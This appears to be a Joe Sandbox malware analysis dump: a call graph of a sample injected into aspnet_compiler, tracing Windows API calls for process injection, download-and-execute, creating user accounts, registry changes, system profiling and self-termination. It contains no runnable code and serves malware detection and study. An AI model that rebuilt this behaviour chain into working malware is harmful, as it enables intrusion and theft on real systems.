415e1e 12094 4034d1 4 API calls 12093->12094 12095 415e2a 12094->12095 12096 4112c4 5 API calls 12095->12096 12097 415e35 12096->12097 12128 405feb VirtualFree 12097->12128 12099 415e3d 12100 4034d1 4 API calls 12099->12100 12101 415e49 12100->12101 12102 4112c4 5 API calls 12101->12102 12103 415e54 12102->12103 12129 405feb VirtualFree 12103->12129 12105 401233 12130 4112f0 12106->12130 12109->12037 12110->12039 12111->12041 12112->12043 12113->12045 12114->12047 12115->12049 12117 413369 12116->12117 12119 413386 12117->12119 12133 41338d Sleep GetTickCount 12117->12133 12119->12052 12121 403237 4 API calls 12120->12121 12122 4112d6 CreateEventA 12121->12122 12122->12067 12123->12069 12124->12075 12125->12081 12126->12087 12127->12093 12128->12099 12129->12105 12131 4032d5 VirtualAlloc 12130->12131 12132 4025e5 12131->12132 12132->12024 12133->12117 10712 409733 10713 405feb VirtualFree 10712->10713 10714 40973e 10712->10714 13261 403e39 13262 413441 11 API calls 13261->13262 13263 403e5e 13262->13263 13264 403549 3 API calls 13263->13264 13265 403e68 13264->13265 13274 405feb VirtualFree 13265->13274 13267 403e6f 13268 402f87 8 API calls 13267->13268 13269 403e97 13268->13269 13270 402fce 2 API calls 13269->13270 13271 403ea0 13270->13271 13272 403148 2 API calls 13271->13272 13273 403ea8 13272->13273 13274->13267 13284 40263b 13285 40263e 13284->13285 13286 40267f 13284->13286 13287 402694 13286->13287 13288 40269b 13286->13288 13295 407e67 13287->13295 13314 407d5e 13288->13314 13292 4026a0 VirtualFree 13293 403148 2 API calls 13292->13293 13294 4026b6 13293->13294 13296 407e84 13295->13296 13297 407e7f 13295->13297 13299 407e99 OpenProcess 13296->13299 13329 407a8e 13296->13329 13328 40fb98 GetCurrentProcess IsWow64Process GetProcessHeap 13297->13328 13301 407eb6 13299->13301 13304 402699 13299->13304 13338 40fbb4 13301->13338 13304->13292 13307 40fbb4 7 API calls 13308 407efc 13307->13308 13308->13304 13354 40fae9 13308->13354 13310 407f3b 13310->13304 13311 
40fae9 7 API calls 13310->13311 13312 407f69 13311->13312 13312->13304 13362 40fc62 13312->13362 13315 407d82 OpenProcess 13314->13315 13316 407d74 13314->13316 13318 407da0 VirtualAllocEx 13315->13318 13321 407d98 13315->13321 13393 40fb98 GetCurrentProcess IsWow64Process GetProcessHeap 13316->13393 13320 407dc0 VirtualProtectEx VirtualAllocEx 13318->13320 13318->13321 13319 407d79 13319->13315 13320->13321 13322 407df6 13320->13322 13321->13292 13323 407e08 WriteProcessMemory 13322->13323 13323->13321 13324 407e1d 13323->13324 13324->13321 13325 407e2d WriteProcessMemory 13324->13325 13325->13321 13326 407e45 13325->13326 13326->13321 13327 407e4a CreateRemoteThread 13326->13327 13327->13321 13328->13296 13330 410cff 2 API calls 13329->13330 13331 407aa4 VirtualAlloc GetWindowsDirectoryA lstrlenA 13330->13331 13332 407adb 13331->13332 13333 407ae7 CreateProcessA 13332->13333 13334 407b21 13333->13334 13335 407b11 Sleep 13333->13335 13337 410cd8 2 API calls 13334->13337 13336 407b29 13335->13336 13336->13299 13337->13336 13339 40fbd4 13338->13339 13340 40fbe9 13338->13340 13339->13340 13370 40f541 13339->13370 13345 407ec6 13340->13345 13378 40f238 13340->13378 13345->13304 13346 40fd0d 13345->13346 13347 40fd28 13346->13347 13350 40fd3d 13346->13350 13348 40f541 4 API calls 13347->13348 13347->13350 13349 40fd31 13348->13349 13352 40f19e 4 API calls 13349->13352 13351 40f238 3 API calls 13350->13351 13353 407ee7 13350->13353 13351->13353 13352->13350 13353->13307 13355 40fb07 13354->13355 13358 40fb1c 13354->13358 13356 40f541 4 API calls 13355->13356 13355->13358 13357 40fb10 13356->13357 13359 40f19e 4 API calls 13357->13359 13360 40f238 3 API calls 13358->13360 13361 40fb7a 13358->13361 13359->13358 13360->13361 13361->13310 13363 40fc8d 13362->13363 13365 40fca2 13362->13365 13364 40f541 4 API calls 13363->13364 13363->13365 13366 40fc96 13364->13366 13367 40f238 3 API calls 13365->13367 13369 40fcf4 13365->13369 13368 40f19e 4 API calls 13366->13368 
13367->13369 13368->13365 13369->13304 13371 40f551 13370->13371 13372 40f55a 13370->13372 13371->13372 13382 40f567 13371->13382 13374 40f19e 13372->13374 13375 40f1b2 13374->13375 13377 40f1bf 13374->13377 13375->13377 13390 40f29d 13375->13390 13377->13340 13379 40f244 13378->13379 13380 40f24e GetModuleHandleW GetProcAddress GetProcAddress 13378->13380 13379->13380 13381 40f287 13379->13381 13380->13381 13381->13345 13383 40f7be 13382->13383 13386 40f580 13382->13386 13383->13372 13385 40f7c7 13388 4022e8 2 API calls 13385->13388 13386->13383 13386->13385 13387 4022e8 2 API calls 13386->13387 13389 401085 GetProcessHeap RtlAllocateHeap 13386->13389 13387->13386 13388->13383 13389->13386 13391 40f541 4 API calls 13390->13391 13392 40f2ae 13391->13392 13392->13377 13393->13319 13394 40123d 13397 40c0f0 13394->13397 13400 40216d 13397->13400 13403 406099 GetProcessHeap HeapAlloc 13400->13403 13402 401242 13403->13402 13404 41023e 13405 403507 3 API calls 13404->13405 13406 410254 13405->13406 13407 404b42 10 API calls 13406->13407 13408 41025c 13407->13408 13409 405044 15 API calls 13408->13409 13410 410265 13409->13410 13411 404ae4 VirtualFree 13410->13411 13412 41026d 13411->13412 13415 405feb VirtualFree 13412->13415 13414 410275 13415->13414 13423 401cca 13426 403eaf 13423->13426 13427 403148 2 API calls 13426->13427 13428 403ec0 13427->13428 13431 405feb VirtualFree 13428->13431 13430 401cd2 13431->13430 13432 4154cd 13435 4020f0 13432->13435 13436 40216d 2 API calls 13435->13436 13439 40210b 13436->13439 13437 40212e 13439->13437 13441 4021c1 13439->13441 13446 402028 13439->13446 13442 405de9 3 API calls 13441->13442 13443 4021d6 13442->13443 13458 401ff2 13443->13458 13447 4020c1 13446->13447 13448 40203e 13446->13448 13450 402137 3 API calls 13447->13450 13465 406099 GetProcessHeap HeapAlloc 13448->13465 13451 4020de 13450->13451 13452 401441 VirtualFree 13451->13452 13453 4020e9 13452->13453 13453->13439 13454 4020b5 13454->13447 13457 401ad0 VirtualFree 
13454->13457 13455 402067 13455->13454 13466 402137 13455->13466 13457->13447 13459 40373f 3 API calls 13458->13459 13460 402002 13459->13460 13461 40373f 3 API calls 13460->13461 13462 40200e 13461->13462 13463 40373f 3 API calls 13462->13463 13464 40201a 13463->13464 13464->13439 13465->13455 13467 403549 3 API calls 13466->13467 13468 402147 13467->13468 13469 403549 3 API calls 13468->13469 13470 402153 13469->13470 13471 403549 3 API calls 13470->13471 13472 40215f 13471->13472 13472->13455 13473 404cd7 13474 404cea 13473->13474 13494 404d34 13473->13494 13475 404e44 13474->13475 13476 404cf6 13474->13476 13479 404ee7 13475->13479 13480 404e4d 13475->13480 13477 404e39 13476->13477 13478 404cfc 13476->13478 13788 40290e 13477->13788 13481 404d05 13478->13481 13482 404daf 13478->13482 13484 404f4b 13479->13484 13485 404eec 13479->13485 13486 404ee0 13480->13486 13487 404e53 13480->13487 13491 404da3 13481->13491 13492 404d0b 13481->13492 13495 404e01 13482->13495 13496 404db4 13482->13496 14043 4027c1 13484->14043 13497 404f42 13485->13497 13498 404ef2 13485->13498 13977 402aa3 13486->13977 13488 404e58 13487->13488 13489 404ebf 13487->13489 13499 404eb0 13488->13499 13500 404e5a 13488->13500 13489->13494 13964 4027ff 13489->13964 13720 402b36 13491->13720 13502 404d10 13492->13502 13503 404d6a 13492->13503 13507 404e06 13495->13507 13508 404e2d 13495->13508 13505 404f67 13496->13505 13506 404dba 13496->13506 14037 40278b 13497->14037 13509 404ef8 13498->13509 13510 404f3b 13498->13510 13955 40d1c8 EnterCriticalSection 13499->13955 13513 404ea3 13500->13513 13514 404e5f 13500->13514 13522 404d12 13502->13522 13523 404d5e 13502->13523 13515 404d97 13503->13515 13516 404d6f 13503->13516 14054 402a9c 13505->14054 13525 404df7 13506->13525 13526 404dbf 13506->13526 13517 404e22 13507->13517 13518 404e0c 13507->13518 13764 402a0a 13508->13764 13511 404efd 13509->13511 13512 404f2e 13509->13512 14034 402774 13510->14034 13529 404f20 13511->13529 13530 404f03 
13511->13530 14031 40cf1b 13512->14031 13946 40906f InitializeCriticalSection DeleteCriticalSection EnterCriticalSection GetModuleHandleA 13513->13946 13531 404e65 13514->13531 13532 404e98 13514->13532 13695 402c31 SetLastError 13515->13695 13537 404d75 13516->13537 13538 404d8b 13516->13538 13539 415a43 9 API calls 13517->13539 13518->13494 13756 40c09d 13518->13756 13542 404d17 13522->13542 13543 404d4d 13522->13543 13652 402d20 13523->13652 13743 402aee 13525->13743 13527 404dc5 13526->13527 13528 404de9 13526->13528 13545 404dcb 13527->13545 13546 404ddf 13527->13546 13734 414345 13528->13734 14012 4026bb 13529->14012 13547 404f17 13530->13547 13548 404f08 13530->13548 13549 404e86 13531->13549 13550 404e6b 13531->13550 13940 409029 EnterCriticalSection 13532->13940 13537->13494 13657 402b4b 13537->13657 13680 402bdc 13538->13680 13539->13494 13557 404d43 13542->13557 13558 404d1d 13542->13558 13612 402e27 13543->13612 13545->13494 13725 402ac6 13545->13725 13728 41430e 13546->13728 13999 40264d 13547->13999 13548->13494 13982 402cbb 13548->13982 13832 40e29a InitializeCriticalSection DeleteCriticalSection EnterCriticalSection 13549->13832 13550->13494 13819 402895 13550->13819 13599 402dc9 13557->13599 13564 404d23 13558->13564 13565 404d39 13558->13565 13564->13494 13571 402d2f 13564->13571 13586 402d82 13565->13586 13572 40373f 3 API calls 13571->13572 13573 402d44 13572->13573 14073 411446 13573->14073 13575 402d4c 14091 4013b3 13575->14091 13580 405044 15 API calls 13581 402d6a 13580->13581 14102 4044fa 13581->14102 13584 402d7f 13584->13494 14133 41154a 13586->14133 13588 402d93 14155 4013fa 13588->14155 13593 405044 15 API calls 13594 402db1 13593->13594 14166 4045e8 13594->14166 13597 402dc6 13597->13494 14202 4122ca 13599->14202 13601 402ddb 14230 40136c 13601->14230 13606 405044 15 API calls 13607 402df9 13606->13607 14241 4046f1 13607->14241 13609 402e23 13609->13494 13611 402e01 13611->13609 14245 401468 13611->14245 14278 410e5e 13612->14278 13617 
4134a2 6 API calls 13618 402e6d 13617->13618 13619 4036f7 4 API calls 13618->13619 13620 402e93 13619->13620 13621 4036f7 4 API calls 13620->13621 13622 402e9c 13621->13622 14297 410f3e GlobalMemoryStatusEx 13622->14297 13624 402ea1 13625 4036f7 4 API calls 13624->13625 13626 402eb2 13625->13626 14298 41119d GetComputerNameW 13626->14298 13629 411177 3 API calls 13630 402ebf 13629->13630 13631 41111b 4 API calls 13630->13631 13632 402ec5 13631->13632 13633 410f61 2 API calls 13632->13633 13634 402ecb 13633->13634 14301 4111d7 13634->14301 13639 405044 15 API calls 13640 402eea 13639->13640 14348 4042cc 13640->14348 14374 4012ff 13652->14374 13656 402d2e 13656->13494 13658 4034d1 4 API calls 13657->13658 13659 402b64 13658->13659 14419 4034b5 lstrcmpA 13659->14419 13661 402b6c 14420 405feb VirtualFree 13661->14420 13663 402b87 13664 402b93 13663->13664 13665 402b8b 13663->13665 13667 4034d1 4 API calls 13664->13667 14421 4102d4 13665->14421 13669 402ba0 13667->13669 13668 402b91 13668->13494 14432 4034b5 lstrcmpA 13669->14432 13671 402ba8 14433 405feb VirtualFree 13671->14433 13673 402bb2 13674 402bb6 13673->13674 13675 402bc9 13673->13675 13676 40ffa8 5 API calls 13674->13676 13677 403507 3 API calls 13675->13677 13676->13668 13678 402bd2 13677->13678 14434 4101ef 13678->14434 14505 41229c OpenProcess 13680->14505 13682 402bf1 13683 402c00 GetLastError 13682->13683 13684 402bf5 13682->13684 13686 402bfc 13683->13686 13685 402dc9 38 API calls 13684->13685 13685->13686 14508 41221f CreateToolhelp32Snapshot 13686->14508 13688 402c13 14516 404413 13688->14516 13691 405044 15 API calls 13692 402c24 13691->13692 14521 4043fc 13692->14521 13696 40373f 3 API calls 13695->13696 13697 402c53 13696->13697 14526 41142a DeleteFileW 13697->14526 13699 402c58 13700 402c8c GetLastError 13699->13700 13701 402c5d 13699->13701 13719 402c8a 13700->13719 13702 40373f 3 API calls 13701->13702 13704 402c66 13702->13704 13703 40373f 3 API calls 13705 402c9d 13703->13705 13706 40373f 3 API 
calls 13704->13706 14538 404098 13705->14538 13708 402c72 13706->13708 14529 403b35 13708->14529 13712 405044 15 API calls 13714 402cae 13712->13714 14543 404081 13714->14543 13715 402c82 14535 403b1e 13715->14535 13719->13703 13721 4012ff 3 API calls 13720->13721 13722 402b42 13721->13722 14551 4076ba 13722->14551 13724 402b49 13724->13494 13726 405044 15 API calls 13725->13726 13727 402adb 13726->13727 13727->13494 14585 41178e WaitForSingleObject 13728->14585 13730 414318 13731 414338 ReleaseMutex 13730->13731 14586 414c38 13730->14586 13731->13494 13733 414331 13733->13731 14589 41178e WaitForSingleObject 13734->14589 13736 414352 13737 41439f ReleaseMutex 13736->13737 13742 414379 13736->13742 14590 406099 GetProcessHeap HeapAlloc 13736->14590 13737->13494 13740 41436d 13741 414e7b 20 API calls 13740->13741 13740->13742 13741->13742 14591 414cb1 CoInitialize CoCreateInstance 13742->14591 14612 4141e5 13743->14612 13750 405044 15 API calls 13751 402b1e 13750->13751 14640 404868 13751->14640 13754 402b33 13754->13494 13757 40c0b0 13756->13757 13758 40c0aa 13756->13758 14680 406045 GetProcessHeap RtlAllocateHeap 13757->14680 13760 401ad0 VirtualFree 13758->13760 13760->13757 13761 40c0c9 14681 401f6d CreateThread 13761->14681 13763 40c0ec 13763->13494 13765 40373f 3 API calls 13764->13765 13766 402a22 13765->13766 13767 411722 5 API calls 13766->13767 13768 402a2a 13767->13768 13769 40373f 3 API calls 13768->13769 13770 402a33 PathFileExistsW 13769->13770 14682 405feb VirtualFree 13770->14682 13772 402a46 13773 402a56 13772->13773 13774 402a4b 13772->13774 14685 4116b1 CreateFileW 13773->14685 14683 4116f0 CreateFileW 13774->14683 13777 402a90 13779 41140c 4 API calls 13777->13779 13778 402a54 13778->13777 13780 40315e 2 API calls 13778->13780 13781 402a98 13779->13781 13782 402a73 13780->13782 13781->13494 14688 41165c 13782->14688 13785 403148 2 API calls 13786 402a88 13785->13786 13787 411644 CloseHandle 13786->13787 13787->13777 13789 410c8a 5 API calls 
13788->13789 13790 402924 13789->13790 13791 4035b9 21 API calls 13790->13791 13792 40292f 13791->13792 13793 40357c 9 API calls 13792->13793 13794 40293e 13793->13794 13795 403447 5 API calls 13794->13795 13796 402946 13795->13796 14695 405feb VirtualFree 13796->14695 13798 40294e 13799 40373f 3 API calls 13798->13799 13800 40295d 13799->13800 14696 40362f 13800->14696 13803 403447 5 API calls 13804 402972 13803->13804 14701 405feb VirtualFree 13804->14701 13806 40297a 14702 405feb VirtualFree 13806->14702 13808 402986 13809 40373f 3 API calls 13808->13809 13810 402992 URLDownloadToFileW 13809->13810 14703 405feb VirtualFree 13810->14703 13812 4029ab 13813 4029b8 ShellExecuteW 13812->13813 13814 4029af 13812->13814 13813->13814 13815 405044 15 API calls 13814->13815 13816 4029ec 13815->13816 14704 405feb VirtualFree 13816->14704 13818 4029f4 13818->13494 13820 40d1c8 5 API calls 13819->13820 13821 4028ab 13820->13821 13822 4034d1 4 API calls 13821->13822 13823 4028c9 13822->13823 14705 405db3 13823->14705 13825 4028d7 13826 403666 11 API calls 13825->13826 13827 4028de 13826->13827 14708 40d20c 13827->14708 13829 4028e4 14723 405feb VirtualFree 13829->14723 13831 4028ec 13831->13494 14728 40dcbf 13832->14728 13835 40e3f4 13837 410a3c 2 API calls 13835->13837 13836 40e2f9 13838 4036f7 4 API calls 13836->13838 13839 40e3f9 13837->13839 13840 40e306 13838->13840 13841 40e56f 13839->13841 14769 4109ed LoadLibraryA 13839->14769 13842 412c67 22 API calls 13840->13842 13843 404c5e 3 API calls 13841->13843 13845 40e312 13842->13845 13846 40e583 13843->13846 13848 403549 3 API calls 13845->13848 13851 405044 15 API calls 13846->13851 13847 40e407 13847->13841 13849 40e40f 13847->13849 13850 40e31d 13848->13850 13852 41111b 4 API calls 13849->13852 14753 405feb VirtualFree 13850->14753 13854 40e58b 13851->13854 13855 40e414 13852->13855 13857 404c3b VirtualFree 13854->13857 13858 40e444 13855->13858 13859 40e419 13855->13859 13856 40e325 14754 405feb VirtualFree 
13856->14754 13861 40e593 LeaveCriticalSection 13857->13861 13865 4035b9 21 API calls 13858->13865 13862 404c5e 3 API calls 13859->13862 13864 40e59c 13861->13864 13866 40e42d 13862->13866 13863 40e332 13867 4036f7 4 API calls 13863->13867 13864->13494 13868 40e44f 13865->13868 13869 405044 15 API calls 13866->13869 13870 40e33f 13867->13870 13871 403549 3 API calls 13868->13871 13872 40e435 13869->13872 13873 412c67 22 API calls 13870->13873 13874 40e45a 13871->13874 13875 404c3b VirtualFree 13872->13875 13876 40e34b 13873->13876 14772 405feb VirtualFree 13874->14772 13879 40e3ca 13875->13879 13880 403549 3 API calls 13876->13880 13878 40e462 13881 4035b9 21 API calls 13878->13881 13882 40e4f8 LeaveCriticalSection 13879->13882 13883 40e358 13880->13883 13884 40e46d 13881->13884 13882->13864 14755 405feb VirtualFree 13883->14755 13886 403549 3 API calls 13884->13886 13888 40e47a 13886->13888 13887 40e360 14756 405feb VirtualFree 13887->14756 14773 405feb VirtualFree 13888->14773 13891 40e36b 13893 403373 lstrlenW 13891->13893 13892 40e482 RegCreateKeyExA RegSetValueExW RegCloseKey 14774 40d2b8 NetUserAdd 13892->14774 13894 40e375 13893->13894 13896 40e3cc 13894->13896 13898 403373 lstrlenW 13894->13898 13899 404c5e 3 API calls 13896->13899 13903 40e380 13898->13903 13904 40e3dc 13899->13904 13900 40e4d8 13905 404c5e 3 API calls 13900->13905 13901 40e50b 13902 4036f7 4 API calls 13901->13902 13906 40e51d 13902->13906 13903->13896 13907 40e384 13903->13907 13908 405044 15 API calls 13904->13908 13909 40e4e8 13905->13909 14780 412c34 13906->14780 13911 4036f7 4 API calls 13907->13911 13912 40e3e4 13908->13912 13913 405044 15 API calls 13909->13913 13915 40e392 13911->13915 13916 404c3b VirtualFree 13912->13916 13917 40e4f0 13913->13917 13919 4036f7 4 API calls 13915->13919 13916->13879 13920 404c3b VirtualFree 13917->13920 13922 40e39c 13919->13922 13920->13882 13921 40e530 13923 4036f7 4 API calls 13921->13923 14757 404c5e 13922->14757 13925 40e53e 13923->13925 13927 
412c34 8 API calls 13925->13927 13929 40e546 13927->13929 13928 405044 15 API calls 13930 40e3af 13928->13930 14789 405feb VirtualFree 13929->14789 14762 404c3b 13930->14762 13933 40e54e 14790 401f6d CreateThread 13933->14790 13937 40e3bf 14768 405feb VirtualFree 13937->14768 13938 40e563 LeaveCriticalSection 13938->13864 13941 409064 LeaveCriticalSection 13940->13941 13942 40903f 13940->13942 13941->13494 14808 401f98 13942->14808 13947 4090e1 13946->13947 13948 4090ca 13946->13948 13950 401f98 2 API calls 13947->13950 14812 401f6d CreateThread 13948->14812 13952 4090e6 13950->13952 13951 4090d5 13953 409100 LeaveCriticalSection 13951->13953 14813 401f6d CreateThread 13952->14813 13953->13494 13956 401f98 2 API calls 13955->13956 13957 40d1e4 13956->13957 13958 401f98 2 API calls 13957->13958 13959 40d1ef 13958->13959 14814 4056d4 shutdown 13959->14814 13962 4056d4 shutdown 13963 40d202 LeaveCriticalSection 13962->13963 13963->13494 13965 405db3 3 API calls 13964->13965 13966 40281f 13965->13966 13967 403666 11 API calls 13966->13967 13968 402826 13967->13968 14816 405feb VirtualFree 13968->14816 13970 40282e inet_addr 13971 402874 13970->13971 13972 40283c getaddrinfo 13970->13972 14817 415f88 13971->14817 13972->13971 13976 402885 13976->13494 13978 405044 15 API calls 13977->13978 13979 402abc 13978->13979 14825 4153a3 13979->14825 13983 40373f 3 API calls 13982->13983 13984 402cd4 13983->13984 13985 411446 17 API calls 13984->13985 13986 402cdc 13985->13986 13987 4013b3 12 API calls 13986->13987 13988 402cea 13987->13988 13989 40373f 3 API calls 13988->13989 13990 402cf3 13989->13990 14829 415102 13990->14829 13993 405044 15 API calls 13994 402d06 13993->13994 14840 4150d2 13994->14840 13997 402d1b 13997->13494 13998 401b27 VirtualFree 13998->13997 14000 40315e 2 API calls 13999->14000 14001 40266b 14000->14001 14002 41350d 2 API calls 14001->14002 14003 402678 14002->14003 14004 402694 14003->14004 14005 40269b 14003->14005 14006 407e67 18 API calls 
14004->14006 14007 407d5e 10 API calls 14005->14007 14008 402699 14006->14008 14009 4026a0 VirtualFree 14007->14009 14008->14009 14010 403148 2 API calls 14009->14010 14011 4026b6 14010->14011 14011->13494 14013 40373f 3 API calls 14012->14013 14014 4026dd 14013->14014 14015 405db3 3 API calls 14014->14015 14016 4026ec 14015->14016 14017 403666 11 API calls 14016->14017 14018 4026f3 14017->14018 14854 405feb VirtualFree 14018->14854 14020 4026fb inet_addr 14021 402743 14020->14021 14022 40270b getaddrinfo 14020->14022 14023 40373f 3 API calls 14021->14023 14022->14021 14024 40274f 14023->14024 14855 413e36 14024->14855 14028 402762 14865 405feb VirtualFree 14028->14865 14030 40276a 14030->13494 14869 406045 GetProcessHeap RtlAllocateHeap 14031->14869 14033 40cf29 CreateThread 14033->13494 14035 405044 15 API calls 14034->14035 14036 402789 14035->14036 14036->13494 14038 402797 14037->14038 14039 4027be 14037->14039 14040 40373f 3 API calls 14038->14040 14039->13494 14041 4027a3 ShellExecuteW 14040->14041 14870 405feb VirtualFree 14041->14870 14044 405db3 3 API calls 14043->14044 14045 4027dc 14044->14045 14046 403666 11 API calls 14045->14046 14047 4027e3 14046->14047 14871 410341 14047->14871 14051 4027f3 14875 405feb VirtualFree 14051->14875 14053 4027fb 14053->13494 14055 412cf5 14054->14055 14885 4124d7 RegDeleteKeyW 14055->14885 14057 412d0b 14058 412d12 TerminateThread 14057->14058 14059 412d1f 14057->14059 14058->14059 14060 412d5f 14059->14060 14061 412612 5 API calls 14059->14061 14062 412d6b GetModuleFileNameA 14060->14062 14063 412d3b 14061->14063 14071 412d9d 14062->14071 14064 4036f7 4 API calls 14063->14064 14065 412d48 14064->14065 14886 4124f2 14065->14886 14069 412d58 14070 412554 RegCloseKey 14069->14070 14070->14060 14072 412df1 CreateProcessA CloseHandle CloseHandle ExitProcess 14071->14072 14074 4018c7 2 API calls 14073->14074 14075 411469 FindFirstFileW 14074->14075 14085 411483 14075->14085 14076 411523 14077 4013b3 12 API calls 14076->14077 
14078 41152e 14077->14078 14080 41153b 14078->14080 14081 401b27 VirtualFree 14078->14081 14079 4036f7 4 API calls 14079->14085 14124 405feb VirtualFree 14080->14124 14081->14080 14083 403549 3 API calls 14083->14085 14084 411543 14084->13575 14085->14076 14085->14079 14085->14083 14087 40373f 3 API calls 14085->14087 14110 405feb VirtualFree 14085->14110 14111 4017c8 14085->14111 14123 405feb VirtualFree 14085->14123 14087->14085 14090 41150d FindNextFileW 14090->14085 14092 4018c7 2 API calls 14091->14092 14095 4013ce 14092->14095 14093 4013f1 14097 40451d 14093->14097 14095->14093 14096 4017c8 6 API calls 14095->14096 14127 401914 14095->14127 14096->14095 14098 4013b3 12 API calls 14097->14098 14099 404535 14098->14099 14100 402d62 14099->14100 14101 401b27 VirtualFree 14099->14101 14100->13580 14101->14100 14103 402d72 14102->14103 14104 40450a 14102->14104 14103->13584 14106 401b27 14103->14106 14105 401b27 VirtualFree 14104->14105 14105->14103 14107 401b38 14106->14107 14108 401b4a 14106->14108 14107->14108 14132 405feb VirtualFree 14107->14132 14108->13584 14110->14085 14112 4017df 14111->14112 14120 401889 14111->14120 14125 406099 GetProcessHeap HeapAlloc 14112->14125 14114 403549 3 API calls 14115 4018a3 14114->14115 14126 405feb VirtualFree 14115->14126 14117 4018c0 14117->14085 14118 401877 14118->14120 14122 401b27 VirtualFree 14118->14122 14119 401808 14119->14118 14121 403549 3 API calls 14119->14121 14120->14114 14121->14119 14122->14120 14123->14090 14124->14084 14125->14119 14126->14117 14128 405de9 3 API calls 14127->14128 14129 40192a 14128->14129 14130 40373f 3 API calls 14129->14130 14131 40193a 14130->14131 14131->14095 14132->14107 14174 406099 GetProcessHeap HeapAlloc 14133->14174 14135 411562 14175 401a48 14135->14175 14138 41158f 14178 406099 GetProcessHeap HeapAlloc 14138->14178 14140 4115a2 GetLogicalDriveStringsW 14150 4115ac 14140->14150 14141 4036f7 4 API calls 14141->14150 14142 4013fa 12 API calls 14143 411630 14142->14143 14145 
41163d 14143->14145 14146 401b52 VirtualFree 14143->14146 14144 403549 3 API calls 14144->14150 14145->13588 14146->14145 14148 4115d0 GetDriveTypeW 14149 40373f 3 API calls 14148->14149 14149->14150 14150->14141 14150->14144 14152 403373 lstrlenW 14150->14152 14154 411622 14150->14154 14179 405feb VirtualFree 14150->14179 14180 401955 14150->14180 14192 405feb VirtualFree 14150->14192 14152->14150 14154->14142 14156 401a48 2 API calls 14155->14156 14157 401415 14156->14157 14158 401438 14157->14158 14160 401955 6 API calls 14157->14160 14196 401a95 14157->14196 14161 40460b 14158->14161 14160->14157 14162 4013fa 12 API calls 14161->14162 14163 404623 14162->14163 14164 402da9 14163->14164 14165 401b52 VirtualFree 14163->14165 14164->13593 14165->14164 14167 4045f8 14166->14167 14168 402db9 14166->14168 14169 401b52 VirtualFree 14167->14169 14168->13597 14170 401b52 14168->14170 14169->14168 14171 401b63 14170->14171 14172 401b75 14170->14172 14171->14172 14201 405feb VirtualFree 14171->14201 14172->13597 14174->14135 14193 406099 GetProcessHeap HeapAlloc 14175->14193 14177 401a71 GetLogicalDriveStringsW 14177->14138 14177->14150 14178->14140 14179->14148 14181 40196c 14180->14181 14189 401a10 14180->14189 14194 406099 GetProcessHeap HeapAlloc 14181->14194 14183 403549 3 API calls 14184 401a2a 14183->14184 14195 405feb VirtualFree 14184->14195 14186 401a41 14186->14150 14187 4019fe 14187->14189 14190 401b52 VirtualFree 14187->14190 14188 401995 14188->14187 14191 403549 3 API calls 14188->14191 14189->14183 14190->14189 14191->14188 14192->14150 14193->14177 14194->14188 14195->14186 14197 405de9 3 API calls 14196->14197 14198 401aab 14197->14198 14199 40373f 3 API calls 14198->14199 14200 401abb 14199->14200 14200->14157 14201->14171 14203 4122ec 14202->14203 14250 401735 14203->14250 14205 41230d CreateToolhelp32Snapshot 14206 412321 Process32FirstW 14205->14206 14207 4124a3 14205->14207 14209 412333 CloseHandle 14206->14209 14210 412374 14206->14210 14208 40136c 
12 API calls 14207->14208 14211 4124ae 14208->14211 14212 40136c 12 API calls 14209->14212 14213 403411 9 API calls 14210->14213 14214 41236f 14211->14214 14218 401468 VirtualFree 14211->14218 14215 412345 14212->14215 14216 412392 OpenProcess 14213->14216 14214->13601 14215->14214 14220 401468 VirtualFree 14215->14220 14223 4123af 14216->14223 14217 4036f7 lstrlenW lstrlenW KiUserExceptionDispatcher VirtualAlloc 14217->14223 14218->14211 14219 4123c2 GetModuleFileNameExW 14219->14223 14220->14215 14221 405feb VirtualFree 14221->14223 14222 403549 lstrlenW lstrcpyW VirtualAlloc 14222->14223 14223->14217 14223->14219 14223->14221 14223->14222 14224 40373f lstrlenW lstrcpyW VirtualAlloc 14223->14224 14225 412426 CloseHandle 14223->14225 14227 401468 VirtualFree 14223->14227 14253 401612 14223->14253 14224->14223 14225->14223 14228 412483 Process32NextW 14227->14228 14228->14210 14229 41249c CloseHandle 14228->14229 14229->14207 14231 401735 2 API calls 14230->14231 14235 401387 14231->14235 14232 4013aa 14236 40472d 14232->14236 14234 401612 6 API calls 14234->14235 14235->14232 14235->14234 14269 401787 14235->14269 14237 40136c 12 API calls 14236->14237 14240 404745 14237->14240 14238 402df1 14238->13606 14239 401468 VirtualFree 14239->14240 14240->14238 14240->14239 14242 40471e 14241->14242 14243 404701 14241->14243 14242->13611 14243->14242 14244 401468 VirtualFree 14243->14244 14244->14243 14276 405feb VirtualFree 14245->14276 14247 401473 14277 405feb VirtualFree 14247->14277 14249 40147f 14249->13611 14267 406099 GetProcessHeap HeapAlloc 14250->14267 14252 40175e 14252->14205 14252->14252 14254 401629 14253->14254 14266 4016ee 14253->14266 14268 406099 GetProcessHeap HeapAlloc 14254->14268 14256 403549 3 API calls 14257 401715 14256->14257 14258 403549 3 API calls 14257->14258 14259 401723 14258->14259 14260 401468 VirtualFree 14259->14260 14262 40172e 14260->14262 14261 401652 14263 403549 lstrlenW lstrcpyW VirtualAlloc 14261->14263 14264 4016c8 14261->14264 

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 004148C5
                                                                            • CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?,?,?,?,00414EDE,?,?,?,00414222), ref: 004148E5
                                                                            • VariantInit.OLEAUT32(?), ref: 00414941
                                                                            • CoUninitialize.OLE32(?,?,?,00414EDE,?,?,?,00414222), ref: 00414A07
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInitInitializeInstanceUninitializeVariant
                                                                            • String ID: "BA$Description$FriendlyName
                                                                            • API String ID: 4142528535-3217936966
                                                                            • Opcode ID: 761bde241649a148fa67ece00141f1678206c90973f6c88279f2455c6c97f1a1
                                                                            • Instruction ID: 897dfebaec31b784598ba9d9a56bb6e289364e2dbf67f6d0e24be1ac2d118ec5
                                                                            • Opcode Fuzzy Hash: 761bde241649a148fa67ece00141f1678206c90973f6c88279f2455c6c97f1a1
                                                                            • Instruction Fuzzy Hash: 62413E74A00245AFCB14DFA5C888DEFBBB9EFC4714B14459EE441EB250DB78DA41CB64
                                                                            Uniqueness

